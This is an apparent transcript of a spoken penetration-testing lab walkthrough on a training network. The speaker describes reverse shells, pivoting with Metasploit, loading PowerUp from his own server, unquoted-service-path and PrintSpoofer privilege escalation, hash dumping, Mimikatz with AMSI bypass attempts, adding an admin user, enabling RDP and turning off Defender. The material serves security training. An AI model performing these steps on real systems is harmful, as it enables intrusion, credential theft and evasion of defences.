Alright, welcome back. So we are on the .100 machine like right now. If I do an ipconfig, we can see that sure enough I'm on here. Okay, how did I do it? Right, so start up a listener with a Metasploit, just a shell reverse TCP. I ran auto route for .150 in the 200, so because remember, I didn't use chisel or anything like that, right? So let me break it down for you guys. I ran auto route, right, for .150 in here, okay? I then ran auto route for .100 in here, in the Windows machine for that 150 machine, and then that ran auto route .100, which then finally put me onto, you know, this machine right here, right? The shell, right? From here, I utilized netcat, okay? And if you were watching the stream earlier, what was wrong was we had to actually wrap netcat in PowerShell. And I ended up using netcat 64 because even while I was just using regular netcat.exe, it still wasn't working for me properly. You can actually see the size difference too between those two. Huge size difference there. So I ran netcat, right, 64.exe, and we were able to call back to myself on port 4444, which I did open up in the firewall on the web server. Once I did that, I had a listener back here on my machine, and it was a netcat, so it is going to be a shell reverse TCP, right? x64 Windows shell, okay? And I was able to get that netcat, I was able to get that guy back, okay? Now, once I caught him, the reason I'm not showing you much else is because if I go to the sessions 28, I then ran power up. So I have my machine down here, right, doing its thing. Okay, my web server down there. I did a IEX, IWR, use basic parsing for my IP address here. Remember, I haven't really been following their write-up to T because you're supposed to use the wrapper. There's a wrapper on here and all sorts of stuff. You're supposed to use things like that. I did not do that. I decided let's use power up and see if I can get a shell like that, you know, do a local privilege escalation like that. So I decided to do this, and I did power up.ps1. I then ran an invoke all. Oh, maybe I should actually do that for PowerShell, huh? Not in command prompt. So let's go ahead and go into PowerShell. This guy's moving very fast, so I threw that in there. And power up.ps1 did not get caught by the antivirus. When you very first hop in this machine, you are going to be in this little uploads part, like right here. Just I CD'd somewhere else, but even when I ran power up in that uploads part, it did not catch it. So power up did not get caught by antivirus. I then did the invoke all checks, and from here, a little bit of an issue. I messed up. I messed up bad. Okay, you're supposed to see a lot more than just this. A lot more. Okay. I'll show you what you're going to see if you run power up. If you don't follow the machine, how they have you doing it, if you run power up, I'll show you what you're supposed to see. So if I come all the way back up here, right, we're supposed to see a System Explorer help service. Like I said, I messed up bad. All right, so we see a System Explorer help service, and if I can find that power up again, so you guys can actually see exactly what it looks like. That's where I was trying different things. Okay, right here. So we see that we are able to restart System Explorer Help Service, and that is running as NT Authority System. Now, the reason we're able to restart this is because of unquoted service path within C program files x86 System Explorer. Right here, there's an unquoted service path, and right here. So you can drop system.exe in there. I said, all right, cool. Let's make a system.exe, and this time I made an interpreter shell. And sure enough, it worked. But then I knew I was only going to get like a command or two before I got kicked out, before antivirus could be like, whoa, you can't do that, right? And sure enough, I got a command in. I did get hash dump in, which is what I actually needed to get in, and then I got kicked out. When I got kicked out and ended up deleting the whole, System Explorer Help Service. It ended up deleting the whole file when I got kicked out. So antivirus ended up taking away that whole file and saying that that thing was a virus. So the file is gone now. Now there are other things we can do though. So that file is gone. I'm going to still try to increase my privileges. I'm going to grab this first. So that's how I ended up getting my privileges to where they are now. So, well, they're not anywhere now, but that's how I ended up doing privilege escalation, right? So let me go ahead and actually complete all this stuff. That's completed. Okay, AV enumeration. I didn't even figure out any of this stuff out. None of it. I ended up using power up like I said, so I didn't have to really do anything else. But I'm going to go ahead, completed. We're going to still run through that stuff like right there. Completed. We did make a system.exe. We did it a little bit different though. We didn't throw it in a wrapper like what they wanted us to do up here. Completed. And then we restarted that service, right? And as you can see, I already threw the administrator's hash in there. Okay. Why is this still saying that I didn't do the whole thing though? Oh, completed. There we go. All right. So it is saying that I didn't throw it in there. But I obviously did because I got the interpreter session back for just a couple seconds, right? So I got the interpreter session back for just enough time to be able to do a hash dump. Now, something else that I saw on there that kind of was like, hey, what the heck? When I do a who am I priv, because I'm still on this box, just that is gone. When I do a who am I priv, we have an impersonate a client after authentication on here. We have the SE impersonate privilege. So I'm thinking we can also do, what is it, the potato or print spoofer attack? I'm thinking we do print spoofer in here. So I'm going to try that also and see if I can increase my privileges with print spoofer. Now let's go ahead. We're going to do our who am I / priv. And what are we looking for here? So research. Okay. One of the privileges on the list is very famous. Yep, print spoofer and potato series of privilege escalation exploits. Which privilege is this? SE impersonate privilege. Submit. Oh, actually right here. Chances are AMSI will alert defender if you try to load any PowerShell priv scripts power up. Oh no, I loaded power up and it did not alert defender. So it also wants us to do this like right here. It says, what is the name, second column of the service? Okay, so what is the name of the service that we can actually hijack, right? And it was System Explorer Helper Service. And remember, I got all of this just from PowerUp itself. And I didn't take down the firewall. I don't have privileges to do that. Is the service running as local system? Yes. Yes, it is. Okay, we have full control of this directory. We do. We saw that, well, I saw that whenever I did PowerUp. Okay, so we did all that, right? Let's go ahead and try to do a print spoofer. Actually, I think I actually have print spoofer already on here. Let's go ahead and locate print spoofer. I should have the executable on here, .exe. And we do print spoofer.exe. Let's go and grab that. All right, I always forget how to run it though. And it's not very difficult to run, but we're going to try to copy him over into here. And let's go ahead and look it up like real quick. I don't think we need that anymore because that was just for the web server. So let's go ahead and look up print spoofer executable. And we should have a, I think it's this one that I have. I have the easier one to use. How about that? Print spoofer tech, yep, tech I, tech C command. Okay. So we're going to go ahead and we're going to run that command like right there. Right. And let's go ahead and do it in a place that usually, this place right here we do have control over still. System Explorer. If I actually CD and do System Explorer also, well, let me go back to command prompt. If I actually CD into System Explorer, the file's still there. It just kind of shut it down. Like we can't even restart it anymore. So after I'm done with this, I'm going to do a shutdown /R to see if maybe that comes back up. Maybe I just messed it up to where antivirus is like, I don't know what the hell to do, you know. But let's go ahead and run a PowerShell. All right, let's try to get that print spoofer in here. wget http 1050.66.5. That's my IP address. We're going to try to do print spoofer.exe. Out file will be print spoofer.exe. All right, we see that he did get print spoofer, right? We got 200, and looks like he got him over here. So if I do a dir, I should see print spoofer in there now. We do. Okay, so let's go ahead and try to run that print spoofer now. Print spoofer.exe, tech I, tech C command. And what do we got here? The name print spoofer is not recognized as the command. Oh, you want to know why? There we go. Who am I? NT authority system. So we can also do a print spoofer. Now that we have that, we can obviously load in Mimikatz, whatever else we want to load in. We can take down firewall, whatever else, right? We have this now, right? So we can try to throw in there. Let's try to go back in that directory again, because that directory seems pretty freaking open. C drive directory CD into program files x86. I wonder if it's in tools also. We want to look in there too. CD into System Explorer. And from here, let's go ahead and try to load up Mimikatz, I guess. Let's go ahead and ls-LA. We'll try to throw Mimikatz in there. Invoke Mimikatz.ps1. Alright, that's what it's called. So we'll do a IEX IWR. Use basic parsing. HTTP 10.50.66.5, right? That's myself. Attack out file will be invoke Mimikatz.ps1. I'm back on the C drive, aren't I? I didn't type it incorrectly anyways, so that's okay. All I'm doing is just copy it from down here. I'm back in our command prompt. PowerShell. Let's go ahead and do that again. Alright, what we got here? The script contains malicious content. That's okay. That is okay. We can take that, right? Because we all know that I love to do my little AMSI bypasses. At least you should know that one by now. And I'm just going to go ahead and grab my AMSI bypass from my host machine here. Give me 1 second. Yep, everyone knows I love my AMSI bypasses. So let's go ahead and run an AMSI bypass in here. Okay. And we'll go ahead and we'll run that same command again. Alright, what is this? Access denied. Error occurred while contact Microsoft Customer Services. I've never seen that one before. Probably because I do an out file? But that's probably why, because I'm trying to... Yeah, I mean, access is denied. You're 100% correct, because... So we did get print spoofer to work. So that is just another way to be able to get up and in there, right? Wow, access denied. 0x5 occurred while reading the console output buffer. Whenever we did that AMSI bypass, we may have broken it from there. Let's try it. See what happens. Okay, so no, that doesn't exist. All right. We could always try to load the executable into here. Since we are in this part, like right here, that doesn't seem to really mind what the hell we do. So we could locate, invoke Mimikatz, and we could look for the executable. I only have the PS1. I only have the executable even on here. Let's see. Let's actually try to Control Z. Yes. Let's do a search for shell 2. Use 0. Let's see if we can get a shell interpreter. Session stack I. Let's go ahead and run it. It's not ARM though. You lie. You lie like a rug. Okay. So we are NT authority system. We need to get that one dude's hash, right? And invoke Mimikatz seems to have... Let's get back into him. Sessions 28. Now if we exit out of here, go back into PowerShell, we now have a full new... We're out of that memory and everything like that, right? So it did not like invoke Mimikatz, right? It also didn't like that AMSI bypass. I'm going to try to run it one more time. But it seems like we might have overloaded the buffer on it. And we'll try to run that invoke Mimikatz one more time. Connection reset error. Okay, so maybe we should just contact Microsoft customer support and say, hey, why can't I do invoke Mimikatz on this machine that's not mine? Let's see what they say. I should write them an email. Hey, what the heck, guys? Oh man, that'd be great. Let's try to find invoke Mimikatz. Let's try to find Mimikatz.exe. Actually, you know what? I think it's just called Mimikatz. Maybe that's why I can't find it with invoke Mimikatz on. mimikatz.exe. Okay, we do have it. So let's try to upload this. Oh, I have it within Wreath. I have it. Why do I have it in Wreath? I already have it in here. Okay, so let's go ahead and do a wget HTTP. My IP address, right? / mimikatz.exe, right? Out file. Oh god. Let's go ahead and enter wget HTTP 10.50.66.5. mimikatz.exe out file is going to be mimikatz.exe. Access denied. Okay, let's go ahead and exit out of here. Go back into command prompting, or go back into PowerShell again. We'll just try that again. Let's get copy this. But it really does not want mimikatz to work on here now, does it? Okay, script contain malicious content. Yeah. Script is blocked by our antivirus software. Okay, so now if we do the AMSI bypass, we break it. Let's try to look up AMSI fail.dll. There's a DLL file we can run for this also. Let's go ahead and locate AMSI. AMSI bypass.txt. Those are wows. Okay, let's go ahead and grab AMSI fail. AMSI DLL bypass. AMSI bypass methods. Pen test laboratories. Let's see if we can do it like this. Because we do need to get that one guy's proof of concept. We need more than proof of concept nowadays. Where's that one at? Like, where are these guys at? Directly strings. Oh, registry key. Oh, we could just do that, huh? Moving the registry key for the AMSI provider will disable the ability of Windows Defender to perform AMSI inspection and evade the control. However, deleting the registry key is not considered a stealthy approach if there is sufficient monitoring in place and also requires elevated rights. We have elevated rights, I'll tell you that much. We definitely have elevated rights. Let's go ahead and grab AMSI bypass. That's PowerShell. See, okay, that worked out good for us. That was a good one. Type 132. Oh, that guy. Try to run that, I guess. Small modification of smells AMSI scan buffer to bypass to use bytes. Use a different opcode. Okay, that's scan buffer. Okay. We're in C. That worked out good for us. Alright, let's go ahead and look up AMSI, bypass, DLL, GitHub. Secure this shit. Don't use okay. Short version. AMSI scan buffer patch. Forcing error, disable script logging, AMSI buffer patch memory. Using macro reflection method. Let's try that. Let's try this like right here. Let's see what this does. I don't know if this is going to do anything. I don't know if this is. I don't know if we can even just copy and paste it in there. I have no idea. Oh, did not like that at all. Okay, let's try a second method then. Didn't like that at all. It's saying hell no. Initiating all one script. Invoke AMSI bypass. We could try this like right here. So let's go ahead and grab this script like right here. Thought I had this, but maybe not. And we will. Let's go ahead and do a nano scripts AMSI bypass all .ps1. Okay, and we want to now copy scripts AMSI bypass all .ps1 over in here, right? And let's try to run that over on here. So let's do a wget 1050.66.5 / AMSI bypass all .ps1. Out file will be that same thing. See if that works. I feel like we broke this machine. I'm just going to copy that, but I feel like we might have broken this machine like right here. Exit, command prompt. PowerShell. I think we may have broken PowerShell. How the hell are we going to get this guy? Okay, there's other ways to be able to do this. Net user, we'll say Ryan, password 1 / add. Net local group administrators Ryan / add Ryan. Net local group remote desktop users add Ryan. Ooh. What? Block by antivirus. Why would it contain malicious content? It's... What? Okay, now we're going to try an AMSI bypass again. And see if I can run that command. And see if I get that same thing that we broke Windows. Okay, never mind, we got it now. That will do a net. I love it. Local group, remote, management users / add Ryan. I have no idea if WMI exec is even on here, or WMI if it's even on here, but we could try it. Evil win RM, and we're going to go ahead and we're going to do a excuse me, evil win RM attack I 10.273.100 attack U Ryan attack P PSNSS30RD1. I don't know if WinRM is even open on this box like right here. Also don't know if remote desktop is open, so we can try Remina. And let's go ahead and do a 10.200.73.100. See if that's even open. I don't know what's open on here. This guy over here. We can always try to get remote desktop to be open. This is C drive. We'll go ahead and we'll do that. But yeah, like we're done. We're done with this guy, but now I'm just kind of messing around. Let's go ahead and do a, because I got that hashed up as soon as I did it. I just got kicked out afterwards. Let's go ahead and look up enable RDP commands, Windows command prompt. How to enable remote desktop using command in Windows 10. Okay, that should work just fine. So we're going to throw this in there. D0 enables it, right? And then 1 disables it, I believe. So let's go ahead and grab that 0 with D0 here. And we're just going to go ahead and exit out here. Throw that in there. Oh, no. Okay, exit out here again. Oh, I'll be back in this command prompt. There we go. So now it's now enabled. So we can try that Remina again. Or we might have to R desktop off. 73.100, right? We'll try that. We should also be able to enable WinRM. Well, I've tried before, but we'll see if we can. Did I do that on my own machine? Enabled it? Yeah, I did. Sorry about that. Here, let me go ahead and grab that. Did it on my actual Windows machine. That's why I looked at like right there. Very first thing that pulls up whenever you Google remote desktop command line interface. We already have a remote desktop user. Let's try running it again. You can always do a port scan from one system into the other one to see if it actually opened up. You can always do something like that also. Let's go ahead. We could also take down the firewalls now too. We could go to or real-time monitoring. We can take all this stuff down now if we want to. We could go to PowerShell and then do a set MPPREFVR preference, disable real-time monitoring. We'll set that to true. Alright, now we may be able to load in Mimikatz with an AMSI bypass in the first place. So let's go ahead and grab that AMSI bypass. May actually be able to do a lot of things now. And now let's go ahead and do an IEX. Yep. Let's go ahead and grab, got out there, put it into memory and nothing. 132 internal error access denied. 0x5 occurred while reading on the console output buffer. I wonder what that means. Contact Microsoft. That's the first time I ever got Contact Microsoft. So that's exciting, right? First time I got that one. Get module before get AD user. However, it's magic that's denied in Node.js console with no more errors thrown. So he did a get module before get AD user. So I wonder if I have to do like a. I wonder if I could just upload it now. wget. And if we can import module or something like that. Or I wonder if everything can just die. Alright, well, you know what? We did it. So we finally got through Wreath. The only questions I haven't answered yet are the chisel ones, because we didn't even do that. Yeah, these guys are right here. So I'll probably just answer these on my own. So I'd have to actually look at it and actually think about it and stuff like that to actually be able to do those two like right there. So that has been finished, right? So awesome. Easy freaking day. All they gotta do is answer the chisel questions and we will be done with that. Now, like we can go ahead and we can exit out of here, exit attack Y. I think I got enough stuff open. This is what it looks like after my test also, just so you guys know. Whenever I do a test, that's what it looks like afterwards also. So, take that how you want. Whenever I do like ECPPT or EWPT or anything like that, that's pretty much what it looked like afterwards. So what's going to look like after I do PMPT. It'll look like that. Now, oh, I forgot to do the shutdown, didn't I? To see if that would work for it. Well, hopefully we get 2 more votes for reset. If not, I'll just try to reset it every hour or something like that. Go ahead and